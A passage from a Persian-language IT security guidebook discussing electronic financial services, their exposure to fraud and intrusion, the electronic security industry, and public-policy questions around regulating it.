ﺳﺮ ﻭ ﻛﺎﺭ ﺩﺍﺭﻧﺪ ﺑﺴﻴﺎﺭ ﺑﻜﺎﺭ ﻣﻲﺁﻳﺪ.
ﺑﻪ ﻋﻠﺖ ﻣﺎﻫﻴﺖ ﻫﻤﻮﺍﺭﻩ ﻣﺘﻐﻴ ﹺﺮ ﻓﻨﺎﻭﺭﻱ ،ﺍﻳﻦ ﻛﺘـﺎﺏ ﻧـﻪﺗﻨﻬـﺎ ﺑـﻪ
ﺟﺰﺋﻴﺎﺕ ﺗﻤﺎﻡ ﺍﻳﻦ ﻣﻮﺿﻮﻋﺎﺕ ﻧﻤﻲﭘﺮﺩﺍﺯﺩ ،ﺑﻠﻜﻪ ﺑﺮﺍﻱ ﺑﻌـﻀﻲ ﺍﺯ
ﺁﻧﻬﺎ ﭘﺎﺳﺨﻬﺎﻱ ﻛﻠﻲ ﻫﻢ ﺍﺭﺍﺋﻪ ﻧﻤﻲﻛﻨﺪ .ﺩﺭ ﻋـﻮﺽ ﺑـﻪ ﻣـﺮﻭﺭﻱ
ﺳــﺮﻳﻊ ﺑــﺮ ﺁﻧﭽــﻪ ﺗــﺎ ﺍﻣــﺮﻭﺯ ﺩﺭ ﺩﻧﻴــﺎﻱ ﺍﻣﻨﻴــﺖ ﺍﺗﻔــﺎﻕ ﺍﻓﺘــﺎﺩﻩ،
ﺷﻜﺎﻓﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭﺣﺎﻝ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻥ
ﻫﺴﺘﻨﺪ ،ﻭ ﺍﺭﺍﺋﻪ ﺑﻌﻀﻲ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﻣﻤﻜﻦ ﺑﺮﺍﻱ ﻛﻢ ﻛﺮﺩﻥ ﺍﻳـﻦ
ﺷﻜﺎﻓﻬﺎ ﻣﻲﭘﺮﺩﺍﺯﺩ ،ﻭ ﻫﻤﭽﻨﻴﻦ ﺑﻪ ﺑﻌﻀﻲ ﻓﻌﺎﻟﻴﺘﻬﺎ ﻛﻪ ﺩﺭ ﺳﺮﺍﺳﺮ
ﺟﻬﺎﻥ ﺑﺮﺍﻱ ﺭﻓﻊ ﺍﻳﻦ ﻧﮕﺮﺍﻧﻴﻬﺎ ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﻧﺪ ﺍﺷﺎﺭﻩ ﻣﻲﻛﻨﺪ.
١٢٨
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺣﻔﺎﻇﺖ ﺍﺯ ﺳﻴﺴﺘﻢ ﻭ ﺩﺍﺩﻩﻫﺎ ﺩﺭ ﻣﻘﺎﺑﻞ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻣﻨﻴﺘﻲ ﺩﺍﺧﻠـﻲ
ﻭ ﺧﺎﺭﺟﻲ ﺳﺎﺯﻣﺎﻥ ﻣﻲﺑﺎﺷﺪ .ﺑﺎﻳﺪ ﺗﻮﺟﻪ ﺩﺍﺷﺖ ﻛﻪ ﺳﻄﺢ ﺍﻣﻨﻴـﺖ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻫﺮ ﻓﻌﺎﻟﻴﺖ ﺑﺎﻳﺪ ﻣﺘﻨﺎﺳﺐ ﺑﺎ ﺍﺭﺯﺵ ﺁﻥ ﻓﻌﺎﻟﻴﺖ ﺑﺎﺷﺪ؛
ﺑﻨــﺎﺑﺮﺍﻳﻦ ﺍﻣﻨﻴــﺖ ﺑــﺮﺍﻱ ﺗﺮﺍﻛﻨــﺸﻬﺎ ﻭ ﻣﻌــﺎﻣﻼﺕ ﻣﻬــﻢ ﺑﺎﻳــﺪ ﺩﺭ
ﺳﻄﺤﻲ ﺑﺎﻻﺗﺮ ﺍﺯ ﺗﺮﺍﻛﻨﺸﻬﺎ ﻭ ﻣﻌﺎﻣﻼﺕ ﻋﺎﺩﻱ ﺗﺄﻣﻴﻦ ﺷﻮﺩ.
ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻳﻚ ﻓﻨﺎﻭﺭﻱ ﺟﺪﻳﺪ ﻣﺨﺎﻃﺮﺍﺕ ﺟﺪﻳﺪﻱ ﻧﻴﺰ
ﺑﻮﺟــﻮﺩ ﻣــﻲﺁﻭﺭﺩ ﻭ ﻓﻨﺎﻭﺭﻳﻬــﺎ ﻫــﺮ ﺭﻭﺯ ﮔــﺴﺘﺮﺩﻩﺗــﺮ
ﻣﻲﺷﻮﻧﺪ ،ﻟﺬﺍ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺷﺎﻳـﺴﺘﺔ ﺗﻮﺟـﻪ
ﺑﻴﺸﺘﺮﻱ ﺍﺳﺖ.
ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻋﺒﺎﺭﺕ ﺍﺳﺖ ﺍﺯ ﺑﻜـﺎﺭ ﺑـﺮﺩﻥ ﻭﺳـﺎﻳﻞ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑـﺮﺍﻱ ﺗﺒـﺎﺩﻝ ﺍﻃﻼﻋـﺎﺕ ،ﺍﻧﺘﻘـﺎﻝ ﻋﻼﺋـﻢ ﻭ ﺍﺳـﻨﺎﺩ
ﺍﻋﺘﺒﺎﺭﻱ ،ﻭ ﺍﻧﺠﺎﻡ ﺩﺍﺩ ﻭ ﺳﺘﺪ ﺩﺭ ﻳﻚ ﻣﺤـﻴﻂ ﺗﺠـﺎﺭﻱ .ﺧـﺪﻣﺎﺕ
ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ ﭼﻬﺎﺭ ﺟﺰﺀ ﭘﺎﻳﻪﺍﻱ ﺗﺸﻜﻴﻞ ﻣﻲﺷﻮﺩ:
•
•
•
•
ﺍﻧﺘﻘﺎﻝﺩﻫﻨﺪﻩﻫﺎﻱ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ )٢٤(EFTs؛
ﺗﺒﺎﺩﻝ ﺩﺍﺩﻩﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ )٢٥(EDI؛
ﺍﻧﺘﻘﺎﻝ ﻣﻨﺎﻓﻊ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ )٢٦(EBTs؛ ﻭ
ﺗﺼﺪﻳﻖ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ).٢٧(ETCs
ﺍﮔﺮﭼﻪ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻳـﻚ ﻓﺮﺻـﺖ ﺑـﺰﺭﮒ ﺟﻬـﺖ
ﮔﺴﺘﺮﺵ ﺗﺠﺎﺭﺕ ﺑﺮﺍﻱ ﺑﺎﺯﺍﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﺩ،
ﺍﻣﺎ ﭼﻨﺪ ﻣﺨﺎﻃﺮﺓ ﺟﺪﻱ ﻧﻴﺰ ﺑﺪﻧﺒﺎﻝ ﺩﺍﺭﺩ .ﺗﻤﺎﻡ ﭼﻬﺎﺭ ﺟﺰﺀ ﺧﺪﻣﺎﺕ
ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣـﺴﺘﻌﺪ ﻛﻼﻫﺒـﺮﺩﺍﺭﻱ ،ﺳـﺮﻗﺖ ،ﺍﺧـﺘﻼﺱ ،ﻭ
ﺩﺳﺘﻜﺎﺭﻱ ﻫﺴﺘﻨﺪ .ﺑﻴﺸﺘﺮ ﺟـﺮﺍﺋﻢ ﺗﺠـﺎﺭﻱ ﻛـﻪ ﺩﺭ ﺍﻳﻨﺘﺮﻧـﺖ ﺭﺥ
ﻣﻲﺩﻫﻨﺪ ﺗﺎﺯﮔﻲ ﭼﻨﺪﺍﻧﻲ ﻧﺪﺍﺭﻧﺪ -ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ،ﺳـﺮﻗﺖ ،ﺟﻌـﻞ
ﻫﻮﻳﺖ ،ﻭ ﺍﺧﺎﺫﻱ ﺳﺎﻟﻬﺎﺳﺖ ﻛﻪ ﺻﻨﺎﻳﻊ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺭﺍ ﺑﻪ ﺳﺘﻮﻩ
ﺁﻭﺭﺩﻩﺍﻧﺪ -ﺍﻣﺎ ﺑـﺎ ﺍﻳﻨﻬﻤـﻪ ،ﭘﻴـﺸﺮﻓﺖ ﻓﻨـﺎﻭﺭﻱ ﻫﻤـﻮﺍﺭﻩ ﺑﺎﻋـﺚ
ﺑﻮﺟﻮﺩ ﺁﻣﺪﻥ ﺍﺑﻌﺎﺩ ﺟﺪﻳﺪﻱ ﻣﻲﮔـﺮﺩﺩ ﻭ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﻣـﻲﺗﻮﺍﻧـﺪ
ﻋﻤﻖ ﻭ ﺩﺍﻣﻨﺔ ﺟﺮﺍﺋﻢ ﺭﺍ ﮔﺴﺘﺮﺩﻩﺗﺮ ﻛﻨﺪ .ﻓﻨﺎﻭﺭﻱ ﺑﺎﻋﺚ ﻣﻲﺷـﻮﺩ
ﺟﻨﺎﻳﺘﻬﺎﻱ ﺑﺴﻴﺎﺭ ﮔﺴﺘﺮﺩﻩ ﻭ ﭘﻴﭽﻴﺪﻩ ﺑﺘﻮﺍﻧﻨﺪ ﺑﺴﺮﻋﺖ ﻭ ﺑـﺼﻮﺭﺕ
ﮔﻤﻨﺎﻡ ﺍﻧﺠﺎﻡ ﺷﻮﻧﺪ .ﺩﺭ ﮔﺬﺷﺘﻪ ﺳﺮﻗﺖ ۵۰,۰۰۰ﻛﺎﺭﺕ ﺍﻋﺘﺒـﺎﺭﻱ
ﺑﺮﺍﻱ ﺟﻨﺎﻳﺘﻜﺎﺭﺍﻥ ﺑﺴﻴﺎﺭ ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ ﻣﺎﻫﻬﺎ ﻳﺎ ﺣﺘﻲ ﺳﺎﻟﻬﺎ ﺯﻣـﺎﻥ
ﻣﻲﺑﺮﺩ؛ ﺍﻣﺎ ﺍﻣﺮﻭﺯ ﻳﻚ ﻣﺠﺮﻡ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺭﺍﻳﮕـﺎﻥ ﺩﺭ
ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﻧﻔﻮﺫ ﺑـﻪ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﻩﻫـﺎﻱ ﻫﻮﻳـﺖ،
Electronic Funds Transfers
Electronic Data Interchange
Electronic Benefits Transfers
Electronic Trade Confirmations
24
25
26
27
ﻫﻤﺎﻥ ﺗﻌﺪﺍﺩ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺭﺍ ﺩﺭ ﺗﻨﻬﺎ ﭼﻨـﺪ ﺛﺎﻧﻴـﻪ ﺑـﻪ ﺳـﺮﻗﺖ
ﺑﺒﺮﺩ.
ﺑﺮ ﺍﺳﺎﺱ ﺑﺮﺭﺳﻴﻬﺎﻱ ﺍﺧﻴﺮ ﺗﺨﻤـﻴﻦ ﺯﺩﻩ ﻣـﻲﺷـﻮﺩ ﻛـﻪ %۵۷ﺍﺯ
ﺣﻤﻼﺕ ﻧﻔﻮﺫ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺩﺭ ﺳﺎﻝ ﮔﺬﺷﺘﻪ ﺍﺯ ﺑﺨﺸﻬﺎﻱ ﻣـﺎﻟﻲ
ﺷﺮﻭﻉ ﺷﺪﻩ ﺑﻮﺩﻧﺪ .ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺗﺨﻠﻔﺎﺕ ﻧﻈﻴﺮ ﻳـﻚ ﻣـﻮﺭﺩ ﺟـﺪﻱ
ﻛﻪ ﺩﺭ ﻭﺯﺍﺭﺕ ﺧﺰﺍﻧـﻪﺩﺍﺭﻱ ﺁﻣﺮﻳﻜـﺎ ﺭﺥ ﺩﺍﺩ ﻧﺎﺷـﻲ ﺍﺯ ﺍﺷـﺘﺒﺎﻩ ﺩﺭ
ﭘﻴــﺎﺩﻩﺳــﺎﺯﻱ ﺭﻭﻧــﺪﻫﺎﻱ ﺍﺭﺯﻳــﺎﺑﻲ ﻣﺨــﺎﻃﺮﻩ ﻭ ﺑﻜــﺎﺭﮔﻴﺮﻱ
ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺗﺠـﺎﺭﻱ ﺁﻣـﺎﺩﻩ ﺑـﺪﻭﻥ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻭﻳﻜﺮﺩﻫـﺎﻱ
ﭼﻨﺪﻻﻳــﺔ ﺍﻣﻨﻴﺘــﻲ -ﻣــﻮﺍﺭﺩﻱ ﭼــﻮﻥ ﺳﻴﺎﺳــﺘﻬﺎﻱ ﻛﺎﺭﻛﻨــﺎﻥ،
ﺭﺍﻫﺒﺮﺩﻫﺎﻱ ﺍﺭﺗﺒﺎﻃﺎﺕ ،ﻭ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻣـﻨﻈﻢ ﺍﺑـﺰﺍﺭ ﻓﻨـﻲ ﻣـﻮﺭﺩ
ﺍﺳﺘﻔﺎﺩﻩ ﻣﺎﻧﻨﺪ ﻭﻳﺮﻭﺱﻳﺎﺑﻬﺎ ٢٨ﻭ ﺩﻳـﻮﺍﺭﻩﻫـﺎﻱ ﺁﺗـﺶ - ٢٩ﺑﻮﺩﻧـﺪ.
ﻧﺘﺎﻳﺞ ﺍﻳﻦ ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﺍﺧﺒﺎﺭ ﺁﻥ ﺑﻪ ﺭﺳﺎﻧﻪﻫﺎ ﻧﻴﺰ ﺭﺍﻩ ﭘﻴﺪﺍ
ﻛﺮﺩ ﻃﻴﻔﻲ ﺷﺪ ﻛﻪ ﻳﻜﺴﻮﻱ ﺁﻥ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﺷﻬﺮﺕ ﻭ ﺍﻋﺘﺒـﺎﺭ
ﻣﺎﻟﻲ ﻭ ﺳﻮﻱ ﺩﻳﮕﺮ ﺁﻥ ﺗﻐﻴﻴﺮ ﺭﻓﺘﺎﺭ ﻧﻬﺎﻥ ﻣﺸﺘﺮﻳﺎﻥ ﺩﺭ ﻣﻘﺎﺑﻠﻪ ﺑـﺎ
ﺩﺍﺩ ﻭ ﺳﺘﺪ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻮﺩ؛ ﻭ ﺍﻳﻦ ﻫﻤﻪ ﺩﻟﻴﻠﻲ ﻧﺪﺍﺷﺖ ﺟﺰ ﻋـﺪﻡ
ﺍﻋﺘﻤﺎﺩ ﻣـﺸﺘﺮﻳﺎﻥ ﺑـﻪ ﻭﺍﺳـﻄﻪﻫـﺎﻱ ﺗﺠـﺎﺭﺕ ﻭ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ.
ﺍﻗﺘﺼﺎﺩ ﺷﺒﻜﻪﺍﻱ ،ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺛﺮﻭﺕ ﻭ ﻫﻤﭽﻨﻴﻦ ﺍﻧﺠﺎﻡ ﺳﺮﻗﺖ ﻭ
ﺗﺨﺮﻳﺐ ،ﻓﺮﺻﺘﻬﺎﻱ ﻣﺘﻔﺎﻭﺗﻲ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﺪ .ﺩﺭ ﺑﺮﺭﺳﻲ ﻣﺰﺍﻳـﺎ ﻭ
ﻣﻌﺎﻳﺐ ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ ،ﺳﻴﺎﺳﺘﮕﺬﺍﺭﺍﻥ ﻭ ﺗﺼﻤﻴﻤﮕﻴﺮﺍﻥ ﺑﺎﻳـﺪ ﺁﮔـﺎﻫﻲ
ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻣـﻮﺭﺩ ﻧﻘـﺸﻲ ﻛـﻪ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺩﺭ ﺗـﻀﻤﻴﻦ
ﺩﺍﺩ ﻭ ﺳﺘﺪﻫﺎﻱ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﺗﺠﺎﺭﻱ ﺑﺎﺯﻱ ﻣـﻲﻛﻨـﺪ ﺍﻓـﺰﺍﻳﺶ
ﺩﻫﻨﺪ.
ﺻــﻨﻌﺖ ﺍﻣﻨﻴــﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﺩﺭﺣــﺎﻝ ﺭﺷــﺪ ﻭ
ﺟﻬﺎﻧﻲﺷﺪﻥ ﺍﺳﺖ؛ ﻟﺬﺍ ﭼﺎﻟﺸﻬﺎﻱ ﺳﻴﺎﺳﺖ ﻋﻤـﻮﻣﻲ
ﺭﺍ ﺩﺭ ﺣﻮﺯﻩﻫﺎﻱ ﺳﻴﺎﺳﺖ ﺭﻗﺎﺑﺘﻲ ،ﺗﻌﺎﺭﺿﻬﺎﻱ ﺑـﺎﻟﻘﻮﺓ
ﻣﻨﺎﻓﻊ ﻭ ﻫﻤﭽﻨﻴﻦ ﺍﻋﻄﺎﻱ ﮔﻮﺍﻫﻲ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ.
ﺩﺭ ﮔﺬﺷــﺘﺔ ﻧﺰﺩﻳــﻚ ﺷــﺮﻛﺘﻬﺎﻱ ﺍﺭﺍﺋــﻪﺩﻫﻨــﺪﺓ ﺧــﺪﻣﺎﺕ ﺍﻣﻨﻴــﺖ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻋﻤﻮﻣﹰﺎ ﺩﺭ ﺳﻪ ﺣﻮﺯﻩ ﻓﻌﺎﻟﻴﺖ ﻣﻲﻛﺮﺩﻧـﺪ :ﺩﺳﺘﺮﺳـﻲ،
ﺍﺳﺘﻔﺎﺩﻩ ،ﻭ ﺍﺭﺯﻳﺎﺑﻲ .ﻋﻼﻭﻩ ﺑـﺮ ﺍﻳﻨﻬـﺎ ،ﺻـﻨﻌﺖ ﺍﻣـﺮﻭﺯﻱ ﺷـﺎﻣﻞ
ﺷﺮﻛﺘﻬﺎﻳﻲ ﺍﺳﺖ ﻛﻪ ﺧﺪﻣﺎﺗﻲ ﺩﻳﮕـﺮ ﻧﻴـﺰ ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ ﺍﺭﺍﺋـﻪ
ﻣــﻲﻛﻨﻨــﺪ؛ ﺧــﺪﻣﺎﺗﻲ ﺍﺯ ﻗﺒﻴــﻞ ﻧﻈــﺎﺭﺕ ﻭ ﻏﺮﺑــﺎﻝ ﻛــﺮﺩﻥ ﺩﺍﺩﻩ،
ﻣﻬﺎﺟﻢﻳﺎﺑﻲ ،ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗـﺶ ،ﺁﺯﻣﻮﻧﻬـﺎﻱ ﻧﻔﻮﺫﭘـﺬﻳﺮﻱ ﺑـﺮﺍﻱ
ﺑﺮﺭﺳﻲ ﻣﻴـﺰﺍﻥ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻱ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎ ﻭ ﺳـﺨﺖﺍﻓﺰﺍﺭﻫـﺎ،
Virus Scanners
Firewalls
28
29
١٢٩
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ ،ﺧـﺪﻣﺎﺕ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﺑﻮﺳـﻴﻠﺔ
ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ،ﻧﺸﺎﻧﻬﺎ ،ﻛﻠﻴـﺪﻫﺎ ﻭ ﻳـﺎ ﻣﻌﻴﺎﺭﻫـﺎﻱ ﺯﻳـﺴﺘﻲ؛ ﻛـﻪ
ﻫﻤﮕــﻲ ﻫﻮﻳــﺖ ﮔﺮﻭﻫﻬــﺎ ﻳــﺎ ﻳﻜﭙــﺎﺭﭼﮕﻲ ﺩﺍﺩﻩﻫــﺎ ﺭﺍ ﺗــﺼﺪﻳﻖ
ﻣﻲﻛﻨﻨﺪ.
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻋﻼﻭﻩ ﺑﺮ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺣﺠﻢ ﻗﺎﺑﻞ
ﺗﻮﺟﻬﻲ ﺍﺯ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻓﻲﻣﺎﺑﻴﻦ ﻋﺮﺿـﻪﻛﻨﻨـﺪﮔﺎﻥ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺭﺍ ﻧﻴﺰ ﺑﺮﻗﺮﺍﺭ ﻣﻲﻛﻨﻨـﺪ .ﺍﻳـﻦ
ﺷﺮﻛﺘﻬﺎ ﺷﺎﻣﻞ ﺷﺮﻛﺘﻬﺎﻱ ﻣﻴﺰﺑﺎﻥISP ،٣٠ﻫـﺎ ﻭ ﺍﺭﺍﺋـﻪﺩﻫﻨـﺪﮔﺎﻥ
ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻫﺴﺘﻨﺪ .ﺷﺮﻛﺘﻬﺎﻱ ﻣﺨﺎﺑﺮﺍﺕ ﺩﺭ ﺑﺎﺯﺍﺭﻫـﺎﻱ ﺟﺪﻳـﺪ
ﻻ ﺑﻌﻨـﻮﺍﻥ ﺍﺭﺍﺋـﻪﻛﻨﻨـﺪﮔﺎﻥ ﻛﻠﻴـﺪﻱ ﺧـﺪﻣﺎﺕ ﻛﻮﺗـﺎﻩﻣـﻮﺝ،
ﻣﻌﻤﻮ ﹰ
ﻣﺎﻫﻮﺍﺭﻩ ﻭ ﺗﻠﻔﻦ ﻫﻤﺮﺍﻩ ﻓﻌﺎﻟﻴﺖ ﺩﺍﺭﻧﺪ .ﺍﻳﻦ ﺷﺮﻛﺘﻬﺎ ﻣﻤﻜﻦ ﺍﺳـﺖ
ﺧﺪﻣﺎﺕ ﻣﻴﺰﺑﺎﻧﻲ ،ﺧﺪﻣﺎﺕ ﺍﻧﺘﻘﺎﻝ ﭘﻮﻝ ﻭ ﺩﺭ ﺑﻌﻀﻲ ﻣﻮﺍﺭﺩ ﺧﺪﻣﺎﺕ
ﺯﻳﺮﺑﻨﺎﻳﻲ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﻧﻴﺰ ﻓﺮﺍﻫﻢ ﻛﻨﻨﺪ.
ﻲ ﺻﻨﻌﺖ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ،
ﺩﺭ ﻣﻘﺮﺭﺍﺕ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜ ﹺ
ﻣﻨﺎﻓﻊ ﻋﻤﻮﻣﻲ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﺗﻮﺟﻪ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺑﺎﺷﺪ .ﺩﺭ
ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎﻳـﺪ ﻣﻴـﺎﻥ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ ﻭ
ﻣﺴﺎﺋﻠﻲ ﻧﻈﻴﺮ ﻫﺰﻳﻨﻪ ،ﻛﻴﻔﻴﺖ ﺧﺪﻣﺎﺕ ،ﻭ ﻧﻮﺁﻭﺭﻱ ﺑـﻪ
ﻳﻚ ﺗﻮﺍﺯﻥ ﻣﻌﻘـﻮﻝ ﺭﺳـﻴﺪ ﻭ ﺩﺭ ﺗـﺪﻭﻳﻦ ﺿـﻮﺍﺑﻂ ﻭ
Hosting Companies
30
ﺻﻨﻌﺖ ﻣﺨﺎﺑﺮﺍﺕ ﺑﻄﻮﺭ ﺳﻨﺘﻲ ﻻﺯﻣﺔ ﺭﻓـﺎﻩ ،ﺁﺳـﺎﻳﺶ ﻭ ﺳـﻼﻣﺖ
ﻋﻤﻮﻣﻲ ﺑﻪ ﺣﺴﺎﺏ ﻣﻲﺁﻣﺪ ﻭ ﺍﺯ ﺍﻳﻨﺮﻭ ﻳﻚ ﺟـﺰﺀ ﺍﺻـﻠﻲ ﺿـﻮﺍﺑﻂ
ﺁﻥ ،ﺗﻮﺳﻌﺔ ﺧﺪﻣﺎﺕ ﺑﻪ ﻣﻨﻈﻮﺭ ﺩﺳﺘﺮﺳﻲ ﻋﻤﻮﻡ ﺑﻮﺩ .ﺍﻣـﺎ ﺩﺭﺣـﺎﻝ
ﺣﺎﺿـﺮ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻛـﺸﻮﺭﻫﺎ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ ﺧـﺪﻣﺎﺕ ﺍﻭﻟﻴــﺔ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﻴﺰ ﻳﻚ ﺿﺮﻭﺭﺕ ﺑﺮﺍﻱ ﺯﻧﺪﮔﻲ ﺑﻪ ﺣﺴﺎﺏ ﻣﻲﺁﻳﺪ.
ﺍﺯ ﻟﺤﺎﻅ ﺗﺎﺭﻳﺨﻲ ،ﺻﻨﻌﺖ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺑﺮ ﺍﺳـﺎﺱ ﺍﻳـﻦ ﻣﻨﻄـﻖ
ﺿﺎﺑﻄﻪﻣﻨﺪ ﺷﺪﻩ ﻛﻪ ﺩﺭ ﻧﻘـﻞ ﻭ ﺍﻧﺘﻘـﺎﻻﺕ ﻣـﻨﻈﻢ ﻛـﺎﻻ ﻭ ﭘـﻮﻝ،
ﺍﻋﺘﻤﺎﺩ ﻭ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺑﺎﻻﺗﺮﻳﻦ ﻣﻴﺰﺍﻥ ﺍﻫﻤﻴﺖ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳـﺖ؛ ﻭ
ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺍﻳﻨﻜﻪ ﻣﺆﺳﺴﺎﺕ ﻣﺎﻟﻲ ﻧﻴﺎﺯﻣﻨﺪ ﺍﻋﺘﻤﺎﺩ ﻣﺮﺩﻡ ﻫـﺴﺘﻨﺪ،
ﺑﺎﻳﺪ ﻓﻌﺎﻟﻴﺖ ﺧﻮﺩ ﺭﺍ ﺳﺎﻟﻢ ،ﻣﻨﻄﻘﻲ ،ﻭ ﻣﺤﺘﺎﻃﺎﻧﻪ ﭘﻴﺶ ﺑﺒﺮﻧـﺪ .ﺑـﺎ
ﻧﺰﺩﻳﻚﺷـﺪﻥ ﺻـﻨﻌﺖ ﻣﺨـﺎﺑﺮﺍﺕ ﻭ ﺑﺨـﺶ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺑـﻪ
ﻳﻜﺪﻳﮕﺮ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ،ﺍﻫﻤﻴﺖ ﻭ ﺿﺮﻭﺭﺕ ﺍﻳﺠـﺎﺩ ﺳﻴﺎﺳـﺖ
ﻋﻤﻮﻣﻲ ﻭ ﻣﻘﺮﺭﺍﺕ ﺁﮔﺎﻫﺎﻧﻪ ﺭﻭﺯ ﺑﻪ ﺭﻭﺯ ﺑﻴﺸﺘﺮ ﻣﻲﺷﻮﺩ ﺗﺎ ﺗﻀﻤﻴﻦ
ﻛﻨﺪ ﻛﻪ ﺩﻭﻟﺖ ،ﺷﺮﻛﺘﻬﺎﻱ ﺗﺠﺎﺭﻱ ﻭ ﻣﺮﺩﻡ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺍﺳـﺘﻔﺎﺩﺓ
ﺧﻮﺩ ﺍﺯ ﺧﺪﻣﺎﺕ ﺍﻳﻤﻦ ﻣﺎﻟﻲ ﺭﺍ ﺍﺩﺍﻣﻪ ﺩﻫﻨﺪ.
